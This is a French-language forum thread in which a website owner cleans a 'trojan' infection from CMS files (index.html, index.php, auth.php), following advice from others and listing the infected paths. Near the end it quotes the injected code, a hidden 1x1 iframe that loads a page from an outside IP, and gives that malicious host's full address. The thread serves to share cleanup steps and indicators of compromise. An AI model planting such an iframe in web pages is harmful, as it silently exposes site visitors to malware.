salut,
mon site a eu une infection par un trojan,
c une ligne kui s est itegré ds les pages .html ou .php
de toute facon, j ai pu courriger la majour partie...
mais la j ai encors le proble, ke le trojan apparait apres l identification

Le Probleme :
je suis a la recherche des fichier .html / .php ki s ouvre uniquement apres l identification ...!!!!

après la connection, c'est la page de redirection qui se charge (system_redirect.html) puis ensuite la page d'accueil avec tous les blocks.

Au passage vérifie si le trojan ne se trouve pas sur ton ordinateur.

Et améliore un peu ton orthographe, si possible ;)

Tiens nous informé de la suite.

desolé pour le retard,

bon, le probleme existe toujours, sauf que le trojan n est plus active... et ne pose aucun risque, a part qu il ralenti le techargement du site apres l identification meme si le password et faux)

le trojan s execute en meme temps de l execution du fichier /user.php

j espere que mon orthographe s est amélioré

merci pour l aide d avance

Bonjour,

Vides les fichiers dans templates_c (sauf index.html) et fais un peu de maintenance sur ta base de données via phpmyadmin

@+

bon, merci pour l aide,,, le je croi que le probleme est résolut, je veux juste indique comment j ai fé
pour l base de données, y avais rien,

pour le dossiers template_c/ j ai trouver sur index.php ... mais c etais pas ce ki apparait apres l identificatication,
a mon avis, c etais le fichier auth.php ke j ai trouver aussi infecté...
bon apres, j ai fermer le site et j ai commencer la verification, de tous les fichiers du site...
en resumé le trojan attaque la majorité du fichier només index.html & index.php & auth.php
apres chaque desinfection, je rendais le mode fichier en 444

*******/_vti_cnf/index.html
*******/include/index.html
******/images/index.html
*******/language/index.html
*******/language/english/auth.php
*******/language/french/auth.php
*******/modules/index.html
*******/templates_c/index.html
*******/class/index.html
*******/class/auth/auth.php
*******/class/auth/index.html
*******/uploads/index.html


NB: j avais deja fait un netoyage... ou meme d autre fichier php etai infecté genre user.php ...
mais j avais ratter surement les fichiers auth

=============

Bon, je vous remercie, et j espere que ma sollutions aideras d autres gens, et j espere que je n ai pas rater autres fichies, sinon je vous le signalerai.

salut, et merci et une autre fois

je veux signaler queslque indices

1/ ==================================

pour les fichier index.html verifier en ligne si la taille est d environ 34k (1000% n est pa infecté)
ceux qui sont infectés sont environ de 196 k

pour les auth, y en a pas bk , je croi qu il sont 3

*******/language/english/auth.php
*******/language/french/auth.php
*******/class/auth/auth.php

2/ ======================================

pour les fichiers .html on trouve toujours le ligne du trojan apres

<body><iframe src='http://*** ip ***/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>


Pour les fichiers .php on la trouve a la fin du txt , apres

}

?><iframe src='http://*** ip ***/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

l adresse complete de ce trojan est http://81.95.149.28/logo/index.php

effacer la ligne de votre fichier, et rendez le en 444 et c bon..